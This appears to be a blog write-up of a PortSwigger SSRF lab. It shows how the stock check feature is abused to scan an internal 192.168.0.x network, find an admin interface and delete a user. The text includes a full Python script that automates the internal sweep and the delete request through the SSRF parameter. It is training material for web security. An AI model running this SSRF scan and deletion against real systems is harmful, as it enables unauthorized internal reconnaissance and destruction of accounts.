SSRF Notes: PortSwigger Labs


Lab 2: Basic SSRF against another back-end system

Task: This lab has a stock check feature that fetches data from an internal system.

To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user Carlos.

This lab is only slightly different from the previous one: instead of pointing the stock check at localhost, we use the SSRF vulnerability to scan the internal 192.168.0.0/24 network, find the one host serving a web app on port 8080, and then use that admin interface to delete the user carlos. The stock check functionality itself is the same as in the previous lab:



The URL the stock check fetches is now different: it points to an internal, non-routable (RFC 1918) address in the 192.168.0.x range. The browser cannot reach that network directly, but the front-end server can, which is exactly what makes the SSRF useful here.


Using Burp Intruder, we brute-force the last octet of 192.168.0.X with the stock check URL pointed at port 8080. The live host stands out because its response (status code and length) differs from all the others, which fail to connect; this way we find the admin interface at 192.168.0.170.


We then use the same SSRF to send a request to the admin interface on 192.168.0.170:8080 that deletes the user carlos.
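The two steps above (sweep the last octet through the stock check, then reuse the SSRF against the host that answered) can be scripted instead of clicking through Intruder. The following is an added example, not code from the original post or from PortSwigger. It assumes the stock check is a POST whose body carries the target URL in a parameter named stockApi, and that the admin interface deletes a user via /admin/delete?username=NAME; both are assumptions you should confirm against your own intercepted request and the admin page you retrieve through the SSRF. The scan logic runs here against a constructed fake of the internal network so the script works offline; swap in http_probe to hit a real lab instance.

```python
"""
Added example (not from the original post): automating the Lab 2 procedure.

Assumptions (also stated in the lead-in):
  - the stock check is a POST whose body carries the target URL in a
    parameter named `stockApi` (read the real name from your intercepted request);
  - the admin interface lives at /admin and deletes a user via
    /admin/delete?username=<name> (hypothetical path; read the real one
    from the admin page you fetch through the SSRF).
"""
from collections import Counter
from typing import Callable, Dict, Optional, Tuple
import urllib.error
import urllib.parse
import urllib.request

# A probe takes the URL the *server* should fetch and returns (status, body)
# of the stock-check response, i.e. what the SSRF relays back to us.
Probe = Callable[[str], Tuple[int, str]]


def candidate_urls(prefix: str = "192.168.0.", port: int = 8080,
                   path: str = "/admin") -> Dict[int, str]:
    """Every host address in the /24 (last octet 1..254) as an admin URL."""
    return {n: f"http://{prefix}{n}:{port}{path}" for n in range(1, 255)}


def http_probe(lab_base: str, stock_endpoint: str = "/product/stock") -> Probe:
    """Real probe: POST the stock check with stockApi pointed at `target`.
    `stock_endpoint` is an assumption; copy it from your own request."""
    def probe(target: str) -> Tuple[int, str]:
        data = urllib.parse.urlencode({"stockApi": target}).encode()
        req = urllib.request.Request(lab_base + stock_endpoint, data=data, method="POST")
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.status, resp.read().decode(errors="replace")
        except urllib.error.HTTPError as e:
            return e.code, e.read().decode(errors="replace")
    return probe


def find_admin_host(probe: Probe, urls: Dict[int, str]) -> Optional[str]:
    """Brute-force the last octet. Dead hosts all produce the same
    connection-failure response, so that status is the baseline and the
    single address that answers differently is the admin host."""
    statuses = {n: probe(url)[0] for n, url in urls.items()}
    baseline = Counter(statuses.values()).most_common(1)[0][0]
    hits = [n for n, s in statuses.items() if s != baseline]
    if len(hits) != 1:
        return None  # nothing found, or several outliers: inspect by hand
    return urls[hits[0]].rsplit("/", 1)[0]  # e.g. http://192.168.0.170:8080


def delete_user(probe: Probe, admin_base: str, username: str) -> int:
    """Reuse the SSRF to make the server call the (assumed) delete endpoint."""
    target = f"{admin_base}/admin/delete?username={urllib.parse.quote(username)}"
    status, _ = probe(target)
    return status


def fake_probe(target: str) -> Tuple[int, str]:
    """Constructed stand-in for the lab's internal network (offline runs only):
    only 192.168.0.170 has the admin app; every other address fails to connect."""
    parts = urllib.parse.urlsplit(target)
    if parts.hostname == "192.168.0.170" and parts.port == 8080:
        if parts.path == "/admin/delete" and "username=carlos" in parts.query:
            return 302, ""  # constructed: pretend the delete redirects back to /admin
        return 200, "<h1>Users</h1><a href='/admin/delete?username=carlos'>carlos</a>"
    return 500, "Could not connect to external stock check service"


if __name__ == "__main__":
    admin = find_admin_host(fake_probe, candidate_urls())
    print("admin interface:", admin)
    if admin:
        print("delete carlos ->", delete_user(fake_probe, admin, "carlos"))
```

Against a real instance, replace fake_probe with http_probe("https://YOUR-LAB-ID.web-security-academy.net") and expect the sweep to take a few minutes, since each candidate is one round trip through the front-end. If find_admin_host returns None, dump the per-host statuses and sort them by response length instead; some back-ends answer every address with the same status but a different body.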



And that's it, we solved the lab.


All of these labs feel too easy, so I am going to skip the write-ups for the easy ones from this point forward; otherwise I feel I won't make significant progress. I can't wait to start solving the CTF challenges.



Comments

  1. I just love to see you explaining stuff; you're really good at that because you don't skip anything.
     Well, hopefully we are going to learn a lot here. Waiting to see how you deal with more complex challenges.
